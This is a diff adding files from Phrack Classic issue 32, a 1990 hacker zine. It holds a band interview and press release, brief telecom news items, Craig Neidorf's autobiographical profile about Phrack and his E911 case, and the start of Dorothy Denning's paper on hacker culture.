+    a reference.  And the people around us are kinda pushing us into it being a
+    theme.  Were not really prepared for that.  Because, while were into it, of
+    the three of us, Im the only one who can hold down a conversation about
+    tech.  And even I have to move over and admit that I am not ane expert
+    hacker.  I just dont know enough.  Like.. Uh.. I know what an FAT is, but
+    I wouldn't know how to rewrite it.
+TC: Well, that's another thing.  Do you make a distinction between hacker as
+    someone who breaks into computers or a hacker who is an intense system
+    programmer?
+KV: Do I make that distinction?
+TC: Yea.
+KV: Umm.. No.. Im not involved enough in the hacker world to make that
+    distinction.
+Me: Do you have anything you want to say to the computer underground?
+KV: Umm.. .yes let me think. . "Roller-skating is not a crime".
+TC: Hah
+PH: ah!
+KV: You know that I live on skates don't you?
+PH: Well on the album cover your wearing skates.. next to that car ... with
+    your..
+KV: My teledestruction gear!
+KV: And, I have to add a grain of salt to the phrase "Hackers of the world
+    unite" thats on our album cover..
+PH: Right.
+KV: We didn't actually intend it to be a huge banner.. it was suppose to be a
+    tiny little comment on the side.. and our label misunderstood our
+    intentions for that.  We didn't think it was quite good enough to have it
+    be a huge .. in such huge print.
+Me: Hmm
+KV: Not a grain of salt.. A tounge and a cheek.
+TC: hehe
+<SILENCE>
+Me: Well, I guess thats about it.. Do you have anything you wanna sum up with?
+KV: Umm..
+<SILENCE>
+Me: Uh, Kurt, do you have an Email address somewhere?
+KV: AH, well, Im embarrassed to say it but only on Prodigy.
+TC: HAH
+Me: Bahah!
+PH: Heh
+Me: Okay.. Well, if that's it..
+KV: Wait.  I do know something I can sum up with..
+KV: Please.. In the case of our album try to overcome your instinct of hacker
+    tendancies and buy an original disk rather than just waiting for a copy..
+KV: Ok?
+Me: Hah
+KV: We need the money.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+[The following is a press release for InSoc's new LP. --DH]
+
+                                 INFORMATION
+                                   SOCIETY
+
+
+"Hackers have no regard for conventional wisdom.  We have no regard for
+musical conventions..."
+
+                                --  Paul Robb
+
+
+"Hack has multiple meanings, some of them self-deprecating.  You can't
+take any of this too seriously or you've missed the point.  It's about
+a playful use of technology, about breaking codes.  It's a post-modern
+aesthetic that comes through in our music..."
+
+                                --  James Cassidy
+
+
+"After having devised, erased and blotted out many other names, we
+finally decided to call our album _Hack_  --  a name that, in our
+opinion, is lofty, sonorous and significant.  It explains that we had
+been only ordinary hacks before we had been raised to our present status
+as first of all hacks in the world..."
+
+                                --  Kurt Valaquen
+
+
+There you have it...as complete a definition of the vision of _Hack_ as
+you're likely to get short of actually listening to Information
+Society's superb new album of the same name.  And if, after reading the
+trio's treatises on the term, you suddenly have a clear understanding of
+what the meaning behind _Hack_ really is, then something's gone wrong.
+_Hack_ is more than the definition.  It's a way of life.  With its own
+soundtrack.
+
+"We're musical hackers of the first order," continues InSoc's Paul Robb.
+"What we do is similiar to computer hackers breaking into sophisticated
+systems to wreak havoc."
+
+"Our music is really different from other progressive styles," adds
+James Cassidy.  "It's funnier and scarier...a mix of pure pop and sub-
+versive stuff underneath the surface."
+
+TOMMY BOY MUSIC, INC.    1747 1ST AV. NY, NY 10128       (212) 722-2211
+
+_______________________________________________________________________________
+
+                              N E W S * B O L T S
+
+                                    {A - G}
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+A>      Four direct telephone circuits linking Seoul to Moscow were set to open
+at midnight last night.  South Korea's Communication Ministry said telephone
+calls between South Korea and the Soviet Union have jumped from four calls in
+all of 1987 to some 5,000 a month this year.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+B>      In the latest issue of IEEE Spectrum (November, 1990), on pages
+117-119, there's an interesting article entitled "The Great Blue Box Phone
+Frauds", subtitled "Until the phone company separated signaling information
+from the voice signal, long-distance calls could be made without charge by
+anyone who could whistle at 2600 hertz."
+
+It even has the illustration from the June 1972 "Ramparts" magazine, showing
+how to constuct a "black box" to prevent the calling party from being billed
+for the call.
+
+There's also a list of about five or six other references at the end
+of the article which sound interesting.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+C>      Registering for AT&T Mail on-line:  make a modem call to 1 800 624 5123
+(2400, 1200, or 300 baud, 8 bit, no parity); give one (or more) <CR>'s; and at
+the login prompt, type REGISTER followed by another <CR>.  The system will walk
+you through its on-line registration procedure.  Have a creditcard number or
+EFT number handy.  You can back out at any time with a ^C (<cntrl>-C) and a
+QUIT.
+
+A couple further AT&T Mail features:
+
+"Mail Talk" permits retrieval of messages w/o a terminal from any DTMF phone --
+text messages get "spoken" by a synthesized voice; and there are "Autoanswer"
+and "Autoresponse" options permitting fairly flexible automatic response to
+either all or selected incoming messages.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+D>      Detroit, Michigan time 313-472-1212.  May soon be replaced with
+a 900 number that charges.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+E>      In Australia, the hacker known as Phoenix was charged with Defrauding
+the Commonwealth, Conspiracy to Commit Treason, and Conspiracy to Commit
+Murder.  The United States has sent representatives from the Federal Bureau of
+Investigation (FBI) and the Computer Emergency Response Team (CERT) overseas to
+help investigate the situation and aid in prosecution of Phoenix.  In the
+meantime, the "eccentric" Phoenix is maintaining ties to hacker friends in the
+USA by use of the Internet.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+F>      Bellcore reports that we have only 9 unused area codes.  The current
+system of generating the codes was supposed to last 100-200 years.  Not to
+worry, a representative at the Bell organization says a new plan is already in
+the works.  The new system consists of replacing the 2nd digit (either 0 or 1)
+with a number between 2 and 9.  Bellcore says the new plan should last 200 more
+years. Hm.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+G>      A new BBS has been set up for a communication flow between hackers,
+fed, and journalists.  713.242.6853  Instant validation for all.  The BBS is
+called FACE to FACE.
+_______________________________________________________________________________
+
+*** END OF PHRACK CLASSIC 32; Email: pc@well.ca.sf.us
+-------------------------------------------------------------------------------
+
+
+
diff --git a/phrack32/2.txt b/phrack32/2.txt
new file mode 100644
index 0000000..4a4d842
--- /dev/null
+++ b/phrack32/2.txt
@@ -0,0 +1,457 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #2 of 12
+
+
+                         ==Phrack Classic Spotlight==
+
+                               Knight Lightning
+                               ~~~~~~~~~~~~~~~~
+
+Personal
+~~~~~~~
+             Handle:  Knight Lightning
+           Call him:  Craig Neidorf
+       Past handles:  None
+      Handle origin:  Cross between character "Lightning Lad" from DC Comics'
+                      Legion of Superheros and Michael Knight from the NBC
+                      television series "Knight Rider".
+      Date of Birth:  I doubt you're sending me a birthday card so skip it.
+Age at current date:  21 years old
+             Height:  5'10" or so (give or take an inch)
+             Weight:  135-140 lbs.
+          Eye color:  Brown
+         Hair Color:  Dark Brown
+          Computers:  Apple IIc (Do you believe this?)
+        Co-Sysop of:  Metal Shop Private, The Brewery, Quick Shop/Metal Shop
+                      AE, Whackoland, The Dark Tower, Digital ITS (yay!),
+                      Stronghold East and probably a few more I've forgotten
+                      about.
+        Net address:  C483307@UMCVMB.MISSOURI.EDU (Yes, they actually gave
+                      C483307@UMCVMB.BITNET        me my account back!)
+                      knight@well.sf.ca.us
+
+------------------------------------------------------------------------------
+      For several years I had been a die hard fan of video games, both arcade
+and home versions.  It was really the Atari 2600 video game Adventure that led
+me into the world of computers and hacking.  As many people might know there
+was a secret locked within this game concerning a "magic" dot.  It was not
+mentioned in any instruction manuals for the game, but if you could find it and
+bring it to the right place in the game, you could enter a room that didn't
+officially exist.  In this room was a message flashing in gold and black.  It
+said "Created by Warren Robinet".  From that point on I experimented with every
+Atari cartridge I had.  I tried screwing around with the connections, the
+components on the system itself, and I attempted bizarre tactics within the
+games, just to see what might happen.  During that period of time I found
+several more secretly implanted messages and developed new ways of playing the
+games.  Atari played on this idea quite a bit when they created a four game
+saga called Swordquest, but by then the fun was taken out of it because you
+knew already that something was waiting to be found.  Eventually I upgraded to
+ColecoVision, but before too long this bored me as well.  It is sort of
+interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
+It makes me wonder if this cycle is permanent.
+     I was first introduced to the world of computers by a friend who had a
+Commodore 64.  He showed me what bulletin boards were and then took me on a
+tour of the ARPAnet.  Later that year, my long-time and best friend, known to
+most of you as Taran King obtained the use of his father's IBM PC.  Together we
+explored various bulletin boards in the St. Louis area, always looking for new
+places to visit.
+     In August of 1983 I received an Apple IIc as a birthday gift from my
+parents.  It was real basic -- no monitor (I had a black and white television
+for that), no extra disk drive, no printer, no joystick, and no modem.  Those
+items I would have to earn.  So instead of playing with faraway computer
+systems, I was introduced to programming and a community of people who
+considered themselves to be software pirates.  These people seemed to be able
+to get software before the companies even began to sell it.  However, I was
+content to play games like Ultima III and Wizardry and hack the game itself by
+altering character values.  This enabled me to move my characters through
+different places, some of which I never might have realized existed.  Later, I
+was able to redesign the game itself to create an endless world of new
+possibilities for intellectual stimulation.
+     Finally in March of 1984, my parents purchased me a modem.  It was a sad
+little piece of plastic made by Volksmodem, 300 baud and battery operated, but
+it worked and now Knight Lightning was ready to take to the wires.  By this
+time I already knew a lot about the bulletin board community through Taran
+King.  Even so, it was relatively odd how fast I became co-sysop of the
+ancestor to Metal Shop known as The Dark Tower.  TDT was operated by a "hacker"
+with the truly unoriginal name of David Lightman.  Before I knew it, I was in
+remote command of his system with full power over user validation and BBS
+maintenance.  Although the system went down after about six months, it did
+attract a few out of state users and it was here that my notoriety began.  It
+was almost funny, but even as early as then Taran King, Forest Ranger, and I
+became known as the top hacker/phreakers in the St. Louis area.  To this day I
+still don't understand why.
+     By July of 1985 most of the hacker bulletin boards in St. Louis had
+disappeared, but The Dark Tower program lived again when Taran King created
+Metal Shop:  The Dark Tower Phase II.  He took the name from a popular
+afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
+Both of us had visited systems around the country and we were able to
+effectively advertise MS.  At one point we had over 500 registered users so we
+switched to a general password system for security reasons and eventually in
+January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
+users.
+     During the late Spring and early Summer of 1985 Taran King and I created
+the 2600 Club.  It was just a group name to stick behind our handles since
+everybody was doing it, but it only took use a few months to realize just
+how ignorant hacker groups really are.  However, the 2600 Club had one
+great legacy -- it gave birth to Phrack.  If you go back and look, you'll
+notice that the first issue of Phrack was a product of the 2600 Club.  The idea
+for doing Phrack came from Forest Ranger.  Taran King provided the arena and
+would be the editor and I came up with the name.
+     When I used to call bulletin boards like the Twilight Zone (sysoped by The
+Marauder) I would data capture the message bases and save them in text files.
+The messages from the hacking subboard would be saved in a file called HACKMESS
+(which stood for hack messages), the messages from the phone phreak subboard
+were saved as PHREAKMESS, but when there was a subboard where both these types
+of messages appeared together, I simply merged the two names and came up with
+PHRACKMESS.  Since the newsletter would contain information on both topics and
+more, I felt the name Phrack was applicable.  So where did the "Inc." come
+from?  Actually it came from another DC Comics series called Infinity Inc.
+Kind of silly now since we never intended to actually incorporate.  The first
+issue of Phrack was distributed on November 17, 1985.
+     In Phrack issue 2 I began the ongoing series of Phrack World News.  I
+followed every story I could and it was fun.  The first issue was sort of lame,
+but eventually I learned that PWN was the most popular segment of Phrack.  The
+greatest thing about PWN was that it was an original concept for a hacker
+newsletter -- lots of people had tried to write "how-to files, but no one had
+ever tried news before.  Who was getting busted?  What did they do?  How can I
+make sure it doesn't happen to me?  Lots of the stories were exaggerated or in
+the case of Oryan QUEST, fabricated (by QUEST himself).
+     Outside of Phrack World News I wrote files about Videoconferencing,
+Private Branch eXchanges, and a few others here and there.  Prior to Phrack
+I had released a huge glossary of telecommunications terms and files about the
+divestiture of AT&T and its aftermath.  Taran King and I also wrote a joke file
+about "Real Phreaks" that was echoed by a continuation of that file in the
+Phrack parody issue number 13 that was released on April 1, 1987.
+     Throughout my years I have met many people who call themselves hackers
+and/or phone phreaks:
+
+Android Pope       - I wonder how married life is treating him.
+Aristotle          - Sporty!  He is the former editor of the New TAP.
+Bad Subscript      - Right hand man to Control C and an expert at disco dancing
+                     in high speed Camaros.
+Bill from RNOC     - How have your phone bills been?  High?  Have they been!?
+                     He is also known as "the most dangerous man in New York."
+Beer Wolf          - Former sysop of the (Metal Shop) Brewery.
+Blue Buccaneer     - Lost track of him over the years.
+Cat Man            - How about a nice Hawaiian Punch?
+Cheap Shades       - Now a Computer Science graduate of University of
+                     Missouri-Rolla.  Former sysop of Metal Shop AE and
+                     QuickShop.
+Control C          - A man with serious problems right now.  Hope you get those
+                     videotapes and best of luck!
+Crimson Death      - The one in 618 NPA.  Very un-original name, but definitely
+                     one of a kind.
+Cryptic Fist       - Kinda warm for that leather jacket, isn't it? (90 degrees)
+Cutthroat          - So what McDonalds do *you* work at?
+Dan The Operator   - An informant for John Maxfield (SummerCon '87).
+Data Line          - Now a government agent, but hardly a hacker tracker.
+David Lightman     - The sysop of The Dark Tower in 314 NPA.
+The Dictator       - Not-so secret agent of Gail Thackeray, the assistant
+                     Arizona state attorney behind Operation Sun-Devil.
+                     In a past life, Dale was the creator of Candid Camera.
+                     What a surprise that was this summer.
+Disk Jockey        - I thought he was a great guy until he started to backstab
+                     me on Lunitic Labs while I was under indictment.
+Doc Holiday (901)  - The original!
+Dr. Cypher         - Knowledgeable person who remains local.
+Dr. Forbin         - Last seen at SummerCon '89.
+Dr. Ripco          - Well haven't met him yet, but in a couple of weeks.
+Doom Prophet       - A friend who seems to have disappeared.
+Epsilon            - Must have lost my number I guess.
+Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
+Erik Bloodaxe      - He is a wildcard... totally unpredictable... hacks by the
+                     seat of his pants.  Still active, but he'd better not have
+                     a squirt gun next to his bed or he may be sorry.{SS}
+Forest Ranger      - The man who introduced me to the hacker elite way back
+                     when.  Former editor of TeleComputist Newsletter.
+Gary Seven         - Don't remember much about him.  Met him with Lex in Fla.
+Hatchet Molly      - You know him as Computer Underground Digest's Gordon
+                     Meyer.  He used a hacker alias to better enable him to
+                     write his famous thesis.
+Jester Sluggo      - A mystery man who is still a legend in the Zantigo
+                     restroom and a better than average drunk driver.
+Kleptic Wizard     - Was he BJ or the Bear?
+Lex Luthor         - One time great legend of LOD, now secret BellSouth
+                     Security (at least until I hear otherwise).
+The Leftist        - I wonder what he was going to say about me at my trial.
+                     He gave me a nod the day they dropped the charges against
+                     me.  The US Attorney's office tells me that he was going
+                     to claim he learned all he knew about hacking from reading
+                     Phrack.
+Loki               - Lost track of him over the years.
+Lucifer 666        - Lights, Camera, Action!
+The Mad Hacker     - Sysop of The Private Connection in 219 NPA.
+Mad Hatter         - Still don't know what to make of him, but I wonder if he
+                     still thinks table salt and baking soda are cocaine.
+The Mentor         - Author of GURPS CyberPunk and former sysop of The Phoenix
+                     Project bulletin board.
+The Noid           - Important enough for Southwestern Bell to question me
+                     about him so important enough to be mentioned here.
+Par                - Hans.
+Phantom Phreaker   - A friend.
+Phil Phree         - Sort of spaced out character and right hand man to The
+                     Ur-vile.
+Phrozen Ghost      - Lost track of him.
+Predat0r           - Anarchistic editor of the New TAP.
+The Prophet        - Didn't actually "meet" him, but I did see him and hear him
+                     speak... as a witness for the prosecution at my trial.  I
+                     don't hold a grudge.  His testimony helped clear me.
+Rabbit             - Franz.
+The Renegade       - Thinks he is part of the Illuminati.
+Reverend Enge      - Not that religious.
+Sir Francis Drake  - A great guy with an odd taste in jewelry.  The editor of
+                     the now defunct WORM.  Duck!
+Sir William        - Never did hear the whole story of his problems with the
+                     University of Michigan computing staff.
+Surfer Bob         - Lost track of him, but he enjoyed a tan at SummerCon'88.
+Synthetic Slug     - Surfs up!
+Taran King         - My best friend of over 11 years.
+TWCB Inc.          - Two brothers who attempted to resurrect TAP, but failed.
+Tuc                - Hey!  He's TUC!
+The Ur-Vile        - Don't know how I feel about him.  He needs a real handle.
+
+     Some of the memorable bulletin boards I was on include:
+
+Alliance              - By Phantom Phreaker
+Brainstorm Elite      - Where I met Phantom Phreaker and recruited him to Metal
+                        Shop Private.
+Broadway Show         - By Broadway Hacker.  Changed its name to The Radio
+                        Station.
+Catch-22              - By Silver Spy.  Only 22 users on this system.
+Chamas                - By Terra (Chaos Computer Club) in Germany.
+Dark Tower            - By David Lightman 314
+Digital ITS           - By Oryan QUEST.  BBS Commands were in Spanish.
+DUNE                  - Secret system imbedded on the Dartmouth University
+                        mainframe operated remotely by Apollo Phoebus.
+Flying Circus         - By Monty Python
+FreeWorld II          - By Major Havoc
+Hell Phrozen Over     - By the original Crimson Death.  Inspiration for the
+                        first Phrack Pro-Phile.
+Intergalactic Dismantling, Inc. - By Aiken Drum
+Lost City of Atlantis - By The Lineman
+Lunatic Labs UnLtd.   - By The Mad Alchemist.  Great system!
+Matrix                - By Dr. Stangelove
+Metal Shop AE         - By Cheap Shades when he lived in St. Louis, Missouri.
+Metal Shop Brewery    - By Beer Wolf who now denies that it ever happened.
+Metal Shop Private    - Greatest bulletin board of all time.
+MetroMedia            - By Dr. Doom.  System became Danger Zone Private.
+NetSys                - By Terminus.  NetSys is now in possession of US Secret
+                        Service and Terminus' life is in a shambles.  They set
+                        him up and shut him down.  You know him as Len Rose.
+Pearly Gates          - First real out of state bulletin board that I called.
+                        It had a secret section of the board for all of the
+                        really good information.  It was operated by Simon
+                        Templar.
+Phoenix Project       - By The Mentor.  Great center of learning.
+Phreak Klass 2600     - By The Egyptian Lover.  Preceded The Phoenix Project as
+                        a great center of learning.
+Pipeline              - Another early bbs I visited.
+Pirate-80             - A codes board run by Scan Man that has been up for
+                        almost 10 years.  This system was NOT a target in
+                        Operation Sun-Devil.  Odd?
+Private Connection    - By The Mad Hacker
+Private Sector        - Legendary system.
+QuickShop             - By Cheap Shades when he lived in Rolla, Missouri.
+RACS III              - By Tuc
+Radio Station         - See The Broadway Show.
+Ripco                 - By Dr. Ripco - Shut down in Operation Sun-Devil, but
+                        its back up now.
+Septic Tank           - By The Safecracker.  Second generation of The Twilight
+                        Zone.
+ShadowSpawn           - By Psychic Warlord.  Great debate about the use of
+                        handles and real name/telephone/etc.  "We're Not
+                        *ELITE*, We're Just Cool As Hell!"  Taran King thought
+                        they were elite in the negative sense of the word.
+                        Great system though.
+Speed Demon Elite     - By The Radical Rocker and home base to MetaliBashers,
+                        Inc.
+Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
+                        run from the home of The Equalizer.
+Twilight Zone         - By The Marauder.  Great system for knowledge from my
+                        early days.
+Zyolog                - By Byte Rider in Hawaii.
+
+     There are probably a few others that I have forgotten to mention.  My
+greatest computer learning experiences came from people like Bill From RNOC,
+RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
+Phrack files and other technical journals.
+     In general I see computers as the communications medium of the 21st
+Century so I devoted a lot of time to mastering their use.  I do not advocate
+the illegal breaking in to computer systems, but there are certain types of
+information that I feel should be available to everyone equally and not just
+the rich or the well connected.
+     Through my experiences on the Internet, I have had legitimate access to
+IBM VM/CMS, Unix, and VAX/VMS systems.  For the most part I am content with my
+VM/CMS account, but will accept invitations from system managers to join their
+systems as well.
+     With Forest Ranger and Taran King, I organized and attended SummerCon '87,
+SummerCon '88, and SummerCon '89.  I did not attend SummerCon '90 since I was
+in Chicago at the time.  I helped in organizing and attended PartyCon '87 and
+most recently I appeared and spoke at the 13th Annual National Computer
+Security Conference in Washington D.C.
+     I had been a part of TeleComputist Newsletter, which inadvertently led to
+my first real media appearance (Detroit Free Press) and prior to that I was
+helping TWCB Inc. to create a NEW TAP.  However, when I learned that they were
+just pulling a fraud, I exposed them.  For 5 years I devoted myself to Phrack
+with absolutely no compensation save knowledge and experiences gained.
+
+===============================================================================
+
+     Interests:  Racquetball (varsity team in high school and a bookshelf full
+                 of trophies), Telecommunications, Computers, Music (classic
+                 rock and pop music... NO RAP!), Fraternity life (well at least
+                 up until the trustees suspended me for being indicted), Women
+                 (sexy and smart over just good looks any day), Driving at warp
+                 speed on the interstate.
+
+Craig's Favorite Things
+-----------------------
+  Women: I've got it, but don't flaunt it.
+   Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
+  Foods: No Curry in a hurry-Blecch!  American, Italian, Mexican, and Chinese!
+  Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
+Leisure: Sleeping, working out, racquetball, writing, computing.
+Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
+
+Most Memorable Experiences
+--------------------------
+All of the SummerCons, having an assistant U.S. Attorney lie to my face and
+tell me I wasn't in trouble five days after he went to the grand jury to have
+me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
+Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
+after I turned myself over to the U.S. Federal Marshalls (E911 Incident),
+Taran King and Cheap Shades out of jail when they were caught trashing,
+summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
+heard Frank & The Funny Phone Call, watching Control C bother some girl
+in the airport and then seeing Erik Bloodaxe fall in love with her.
+
+
+Some Other People To Mention
+----------------------------
+Sheldon Zenner      - The greatest attorney practicing today.  He turned
+                      everything around and saved my future from a legal system
+                      gone awry.  Thanks also to Kliebard, Dunlop, Berkowitz,
+                      and Kaufman.
+
+John Perry Barlow   - Lyricist for the Grateful Dead and amazing writer, John
+                      also participated a great deal in generating publicity
+                      about my case and helped found the Electronic Frontier
+                      Foundation.
+Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
+                      me to the 13th Annual National Computer Security
+                      Conference and is a good friend.
+Peter Denning       - Senior editor of the Communications of the ACM and an
+                      interesting fellow in his own right.
+Scott Ellentuch     - Mentioned earlier as Tuc, Scott is the president of the
+                      Telecom Computer Security Group and a close friend.  Tuc
+                      assisted the defense team by locating the Bellcore public
+                      catalog and the 911 documents found within.  Thanks Tuc!
+Terry Gross         - Attorney with Rabinowitz & Boundin in New York City who
+                      was hired by the EFF to work on court motions dealing
+                      with the First Amendment.
+Mike Godwin         - Don't know Mike very well yet, but he was very outspoken
+                      in Computer Underground Digest while I was under
+                      indictment and now he is in-house counsel to the
+                      Electronic Frontier Foundation.
+Katie Hafner        - Author of a book coming soon about Pengo, Kevin Mitnick,
+                      and Robert Morris, Jr.  I met Katie at the NCSConference.
+Steve Jackson       - Founder of Steve Jackson Games.  I haven't yet had the
+                      pleasure of meeting Steve, but we may be running into
+                      each other in the near future.
+Mitch Kapor         - Industry wizard and creator of the Lotus 1-2-3 program,
+                      Mitch is a founding member of the Electronic Frontier
+                      Foundation that provided legal assistance in my case.  I
+                      hope to meet him face-to-face in the near future.
+Gordon Meyer        - Gordon has been a tremendous help with Phrack and a
+                      friend throughout my entire trial ordeal.
+John Nagle          - Inventor who gave technical assistance to my defense team
+                      and located some very important public documents.
+Marc Rotenberg      - Director of the Computer Professionals For Social
+                      Responsibility in Washington D.C.  CPSR is an
+                      organization lobbying Congress for reforms in the
+                      Computer Fraud & Abuse Act and other legislation.  I hope
+                      to be working with him in the future.
+Jim Thomas          - Creator and editor of Computer Underground Digest, he
+                      brought the details and evidence in my trial to the
+                      public eye which helped me gain support.
+Steve Wozniak       - Never had any contact with him, but since he had a hand
+                      in EFF, I thought I would mention him.  Incidentally I'm
+                      ready to upgrade computers if someone has a Macintosh on
+                      hand.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+David Lightman   - The one in 214.  See Oryan QUEST.
+Magic Hasan      - Totally freaked out when I contacted him this semester.  It
+                   was like he thought I had the plague or something.
+Olorin The White - He couldn't seem to understand that I did not want to join
+                   his group.
+Oryan QUEST      - A hacker who made up news for PWN just to boost his
+                   reputation.  Unleash with full force on this!
+Sally Ride       - Also known as Space Cadet, SR co-wrote one of the most
+                   interesting PWN articles ever printed.
+===============================================================================
+
+Private Jokes
+~~~~~~~~~~~~
+There are far too many to go through and most of them have been previously
+written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
+My private jokes shall remain private between those involved or at least until
+I publish a book covering the topic.
+
+===============================================================================
+
+     Phrack is a part of my life that is now over.  I hope that Phrack Classic
+which appears to be a second generation Phrack will learn from its predecessor
+and not allow any articles that advocate the illegal entry into computer
+systems.  On the other hand, I hope they will continue to bring interesting
+information and news to light every issue.
+     For the record, I am not the editor of Phrack Classic.  In fact I am not
+even a part of their staff.  I would ask that no one send me any articles for
+that publication because they will not be forwarded.  I take no responsibility
+for the actions taken by Phrack Classic, but I have faith that they shall stay
+on the path of honesty and integrity.
+     I also have a few words to say about some other issues.  My case and
+prosecution had absolutely nothing to do with Operation Sun-Devil, with a
+possible exception being the secret video-taping done by the United States
+Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
+July 22-24, 1988 (i.e., SummerCon '88).  Operation Sun-Devil was an attempt to
+crack down on credit card and calling card abusers and NOT hackers.  Yes, there
+are some hackers that abuse these items, but the mere abuse of such does not
+make someone a hacker and it is about time that mainstream reporters,
+government agents, and prosecutors began to understand the difference.
+     I feel that the abuse of "cards" is very immature and should be met with
+stern punishment.  I myself have been the victim of credit card fraud and I can
+tell you that it is not pleasant to open your bill and see expensive charges
+from QVC Home Shopping Network.  For the younger readers, it may take them a
+few years to understand this... perhaps when they have credit cards and bills
+of their own to deal with.
+     As you may guess there is MUCH MORE to my story especially concerning the
+last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
+the time or the place to tell it.  Sometime in the future I hope to assemble
+the tales of all my adventures in the computer underground and publish them in
+a real book.
+     Finally, Hackers are *NOT* criminals!  Quoting from the brochure for this
+year's Hackers Conference in Saratoga, California, a Hacker is "someone who
+enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
+solutions, <and> adventuring into uncharted areas."
+
+:Craig Neidorf
+
+===============================================================================
+
+...And now for the regularly taken poll from all interviewees.
+
+     Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?
+
+     "I would not consider most of the hackers or phone phreaks I have met to
+be computer geeks, however over the years I have run into people whose goal in
+life is to pirate every piece of software in existence and of those people I
+feel that a strong percentage are 'geeks'."
+
+     Thanks for your time, Craig.  "No problem."
+
+                                            Crimson Death
+_______________________________________________________________________________
diff --git a/phrack32/3.txt b/phrack32/3.txt
new file mode 100644
index 0000000..35a2cbf
--- /dev/null
+++ b/phrack32/3.txt
@@ -0,0 +1,1092 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #3 of 12
+
+              Concerning Hackers Who Break into Computer Systems
+
+                              Dorothy E. Denning
+               Digital Equipment Corp., Systems Research Center
+                   130 Lytton Ave., Palo Alto, CA 94301
+                     415-853-2252, denning@src.dec.com
+
+
+Abstract
+
+A diffuse group of people, often called ``hackers,'' has been
+characterized as unethical, irresponsible, and a serious danger to
+society for actions related to breaking into computer systems.  This
+paper attempts to construct a picture of hackers, their concerns,
+and the discourse in which hacking takes place.  My initial findings
+suggest that hackers are learners and explorers who want to help
+rather than cause damage, and who often have very high standards
+of behavior.  My findings also suggest that the discourse surrounding
+hacking belongs at the very least to the gray areas between larger
+conflicts that we are experiencing at every level of society and
+business in an information age where many are not computer literate.
+These conflicts are between the idea that information cannot be owned
+and the idea that it can, and between law enforcement and the First
+and Fourth Amendments.  Hackers have raised serious issues about
+values and practices in an information society.  Based on my findings,
+I recommend that we work closely with hackers, and suggest several
+actions that might be taken.
+
+
+1.  Introduction
+
+The world is crisscrossed with many different networks that are used
+to deliver essential services and basic necessities -- electric power,
+water, fuel, food, goods, to name a few.  These networks are all
+publicly accessible and hence vulnerable to attacks, and yet virtually
+no attacks or disruptions actually occur.
+
+The world of computer networking seems to be an anomaly in the
+firmament of networks.  Stories about attacks, breakins, disruptions,
+theft of information, modification of files, and the like appear
+frequently in the newspapers.  A diffuse group called ``hackers''
+is often the target of scorn and blame for these actions.  Why are
+computer networks any different from other vulnerable public networks?
+Is the difference the result of growing pains in a young field?
+Or is it the reflection of deeper tensions in our emerging information
+society?
+
+There are no easy or immediate answers to these questions.  Yet it
+is important to our future in a networked, information-dependent
+world that we come to grips with them.  I am deeply interested in
+them.  This paper is my report of what I have discovered in the early
+stages of what promises to be a longer investigation.  I have
+concentrated my attention in these early stages on the hackers
+themselves.  Who are they?  What do they say?  What motivates them?
+What are their values?  What do that have to say about public policies
+regarding information and computers?  What do they have to say about
+computer security?
+
+>From such a profile I expect to be able to construct a picture of
+the discourses in which hacking takes place.  By a discourse I mean
+the invisible background of assumptions that transcends individuals
+and governs our ways of thinking, speaking, and acting.  My initial
+findings lead me to conclude that this discourse belongs at the very
+least to the gray areas between larger conflicts that we are
+experiencing at every level of society and business, the conflict
+between the idea that information cannot be owned and the idea that
+it can, and the conflict between law enforcement and the First and
+Fourth Amendments.
+
+But, enough of the philosophy.  On with the story!
+
+
+2.  Opening Moves
+
+In late fall of 1989, Frank Drake (not his real name), editor of
+the now defunct cyberpunk magazine W.O.R.M., invited me to be
+interviewed for the magazine.  In accepting the invitation, I hoped
+that something I might say would discourage hackers from breaking
+into systems.  I was also curious about the hacker culture.  This
+seemed like a good opportunity to learn about it.
+
+The interview was conducted electronically.  I quickly discovered
+that I had much more to learn from Drake's questions than to teach.
+For example, he asked: ``Is providing computer security for large
+databases that collect information on us a real service?  How do
+you balance the individual's privacy vs. the corporations?''  This
+question surprised me.  Nothing that I had read about hackers ever
+suggested that they might care about privacy.  He also asked: ``What
+has (the DES) taught us about what the government's (especially NSA's)
+role in cryptography should be?''  Again, I was surprised to discover
+a concern for the role of the government in computer security.  I
+did not know at the time that I would later discover considerable
+overlap in the issues discussed by hackers and those of other computer
+professionals.
+
+I met with Drake to discuss his questions and views.  After our
+meeting, we continued our dialog electronically with me interviewing
+him.  This gave me the opportunity to explore his views in greater
+depth.  Both interviews appear in ``Computers Under Attack,''
